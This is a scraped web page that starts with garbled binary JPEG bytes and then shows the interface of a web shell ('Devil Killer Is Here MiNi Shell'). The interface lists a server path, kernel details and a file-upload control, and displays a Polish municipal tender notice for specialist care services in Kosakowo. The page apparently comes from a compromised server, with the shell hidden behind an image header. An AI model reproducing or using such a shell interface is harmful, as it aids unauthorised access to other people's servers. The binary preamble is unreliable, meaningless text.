JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250121/0005235001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie specjalistycznych usług opiekuńczych, dla osób dorosłych i dzieci – podopiecznych Gminnego Ośrodka Pomocy Społecznej w Kosakowie w 2025 roku- 4 edycja </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 002837216</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Fiołkowa 2B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kosakowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-198</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kierownik.gops@kosakowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gops.kosakowo.com</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie specjalistycznych usług opiekuńczych, dla osób dorosłych i dzieci – podopiecznych Gminnego Ośrodka Pomocy Społecznej w Kosakowie w 2025 roku- 4 edycja </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-73941af6-6172-4310-9a80-353b4908367d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00052350</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00006554/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie usług opiekuńczych zwykłych oraz specjalistycznych usług opiekuńczych, dla osób dorosłych i dzieci z autyzmem – podopiecznych Gminnego Ośrodka Pomocy Społecznej w Kosakowie w 2025 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/gmina_kosakowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.platformazakupowa.pl/pn/gmina_kosakowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty plików wykorzystywanych<br/>przez wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie<br/>ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań<br/>dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych”.<br/>1. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>2. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>1. .zip<br/>2. .7Z<br/>3. Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages.<br/>Dokumentyzłożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB,<br/>oraznaograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi<br/>max 5MB.<br/>5. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca,<br/>wmiaręmożliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym<br/>PAdES. 6. Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać,<br/>aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>7. Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanieróżnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>8. Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość<br/>prawidłowegowykorzystaniawybranej metody podpisania plików oferty.<br/>9. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij<br/>wiadomośćdozamawiającego”, nie za pośrednictwem adresu email.<br/>10. Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>11. Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie zamówienia<br/>publicznegoizachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania ofert/wniosków. Sugerujemy złożenie oferty<br/>na 24 godziny przed terminem składania ofert/wniosków.<br/>12. Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>13. Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Dyrektor GOPS Kosakowo KOSAKOWO, 81-198 KOSAKOWO, UL.<br/>FIOŁKOWA 2B;<br/>2) kontakt z Inspektorem ochrony danych możliwy jest pod adresem e-mail: rodo.gops@kosakowo.pl, tel.: 58 620-82-02 1)<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>2) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>woparciu o art. 74 ustawy P.Z.P.<br/>3) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia<br/>zakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje<br/>cały czas trwania umowy;<br/>4) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowymokreślonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego. RODO.<br/>6) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie<br/>ztegoprawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do<br/>sprostowanianiemoże skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych<br/>zzastrzeżeniemokresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa<br/>w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzaniedanychosobowych Pani/Pana dotyczących narusza przepisy RODO; 7) nie przysługuje Pani/Panu: a) w związku z art.<br/>17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzaniaPani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>8) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Specjalistyczne usługi opiekuńcze, w tym dla osób z zaburzeniami psychicznymi - dotacja z państwa (1 osoba – łącznie 60<br/>godzin)<br/>1. Przedmiotem zamówienia jest usługa. Przez specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi z<br/>zadań zleconych gminie rozumie się świadczenie usług na rzecz podopiecznych GOPS w Kosakowie, w miejscu ich<br/>zamieszkania, polegających w szczególności na:<br/>a) rozwijaniu umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza: • kształtowanie umiejętności<br/>zaspokajania podstawowych potrzeb życiowych i umiejętności społecznego funkcjonowania, motywowanie do aktywności,<br/>leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także<br/>w formie asystowania w codziennych czynnościach życiowych, w szczególności takich jak:  samoobsługa, zwłaszcza<br/>wykonywanie czynności gospodarczych i porządkowych, w tym umiejętność utrzymania i prowadzenia domu,  dbałość o<br/>higienę i wygląd,<br/> utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze społecznością lokalną, wspólne<br/>organizowanie i spędzanie czasu wolnego, korzystanie z usług różnych instytucji,<br/>• interwencje i pomoc w życiu w rodzinie, w tym:<br/> pomoc w radzeniu sobie w sytuacjach kryzysowych - poradnictwo specjalistyczne, interwencje<br/>kryzysowe,wsparciepsychologiczne, rozmowy terapeutyczne,  ułatwienie dostępu do edukacji i kultury,<br/> doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc wformiespecjalistycznych usług,<br/> kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi, współpraca z rodziną - kształtowanie odpowiednich<br/>postaw wobec osoby chorującej, niepełnosprawnej,• pomoc w załatwianiu spraw urzędowych, w tym:<br/> w uzyskaniu świadczeń socjalnych, emerytalno-rentowych,<br/> w wypełnieniu dokumentów urzędowych,<br/>• wspieranie i pomoc w uzyskaniu zatrudnienia, w tym zwłaszcza:<br/> w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia lub alternatywnego zajęcia, w<br/>szczególnościuczestnictwow zajęciach warsztatów terapii zajęciowej, zakładach aktywności zawodowej, środowiskowych<br/>domach samopomocy, centrach i klubach integracji społecznej, klubach pracy,<br/> w kompletowaniu dokumentów potrzebnych do zatrudnienia,<br/> w przygotowaniu do rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą, w rozwiązywaniu<br/>problemów psychicznych wynikających z pracy lub jej braku.<br/>• pomoc w gospodarowaniu pieniędzmi, w tym:<br/> nauka planowania budżetu, asystowanie przy ponoszeniu wydatków,<br/> pomoc w uzyskaniu ulg w opłatach,<br/> zwiększanie umiejętności gospodarowania własnym budżetem oraz usamodzielnianie finansowe;b) pielęgnacja -<br/>jakowspieranie procesu leczenia, w tym:<br/>• pomoc w dostępie do świadczeń zdrowotnych,<br/>• uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych,<br/>• pomoc w wykupywaniu lub zamawianiu leków w aptece,<br/>• pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania,<br/>• w szczególnie uzasadnionych przypadkach zmiana opatrunków, a także w utrzymaniu higieny,• pomoc w dotarciu do<br/>placówek służby zdrowia,• pomoc w dotarciu do placówek rehabilitacyjnych. c) pomoc mieszkaniowa, w tym:<br/>• w uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat,<br/>• w organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych,• kształtowanie właściwych<br/>relacjiosoby uzyskującej pomoc z sąsiadami i gospodarzem domu;<br/>2. Realizacja zamówienia wymaga Wykonawcy, który dysponuje zapleczem personalnym, spełniającym następujące<br/>wymagania:<br/>a) Personel posiadający jedną z niżej wymienionych kwalifikacji do wykonywania zawodu:<br/>• Opiekunki środowiskowej,<br/>• Asystenta osoby niepełnosprawnej,<br/>• Terapeuty zajęciowego,<br/>• Pielęgniarki,<br/>• Pracownika socjalnego.<br/>b) Personel świadczący specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi posiadający minimum<br/>półroczny staż pracy w jednej z następujących jednostek:<br/>• w jednostce świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi,• zakładzie rehabilitacji,<br/>• ośrodku terapeutyczno – edukacyjno – wychowawczym,<br/>• placówce terapii lub placówce oświatowej dla osób z zaburzeniami psychicznymi,<br/>• jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi,<br/>• szpitalu psychiatrycznym,<br/>• innej jednostce niż wymienione, świadczące specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi.<br/>c) Personel posiada przeszkolenie i doświadczenie w jednej z niżej wymienionych dziedzin:<br/>• prowadzenia treningów samoobsługi;<br/>• wspomagania procesu uczenia się;<br/>• prowadzenia treningów zachowań społecznych;<br/>• kształtowania motywacji do akceptowanych przez otoczenie zachowań,<br/>• kształtowanie nawyków celowej aktywności </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Specjalistyczne usługi opiekuńcze, w tym dla osób z zaburzeniami psychicznymi i innymi schorzeniami lub<br/>niepełnosprawnością: dorosłych oraz dzieci - dotacja (1 osoba – łącznie 60 godz.)<br/>1. Przedmiotem zamówienia jest: usługa. Przez specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi i<br/>innymi schorzeniami lub niepełnosprawnością z zadań zleconych gminie rozumie się świadczenie usług na rzecz<br/>podopiecznych GOPS w Kosakowie, w miejscu ich zamieszkania, polegających w szczególności na:<br/>a) pielęgnacja - jako wspieranie procesu leczenia, w tym: w szczególnie uzasadnionych przypadkach<br/>zmianaopatrunków,pomoc w użyciu środków pomocniczych i materiałów medycznych, przedmiotów ortopedycznych,<br/>b) rehabilitacja fizyczna i usprawnianie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z<br/>dnia27sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz. U. z 2020 r., poz.<br/>1398, z późn. zm.):<br/>• zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii, • współpraca ze<br/>specjalistami w zakresie wspierania psychologiczno-pedagogicznego i edukacyjno-terapeutycznego zmierzającego do<br/>wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług; 2. Realizacja zamówienia wymaga Wykonawcy,<br/>który dysponuje zapleczem personalnym, spełniającym następujące wymagania:<br/>a) Personel posiadający jedną z niżej wymienionych kwalifikacji do wykonywania zawodu:<br/>• Fizjoterapeuty,<br/>• Specjalisty w zakresie rehabilitacji medycznej,<br/>• Pielęgniarki,<br/>• Pedagoga,<br/>• Logopedy, psychologa,<br/>b) Personel świadczący specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi posiadający minimum<br/>półroczny staż pracy w jednej z następujących jednostek:<br/>• w jednostce świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi,• zakładzie rehabilitacji,<br/>• ośrodku terapeutyczno – edukacyjno – wychowawczym,<br/>• placówce terapii lub placówce oświatowej dla osób z zaburzeniami psychicznymi,<br/>• jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi,<br/>• szpitalu psychiatrycznym,<br/>• innej jednostce niż wymienione, świadczące specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi.<br/>c) Personel posiada przeszkolenie i doświadczenie w jednej z niżej wymienionych dziedzin:<br/>• usprawniania zaburzonych funkcji organizmu;<br/>• wspomagania procesu terapeutycznego poza miejscem zamieszkania,• kształtowania motywacji do akceptowanych<br/>przezotoczenie zachowań, kształtowanie nawyków celowej aktywności </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 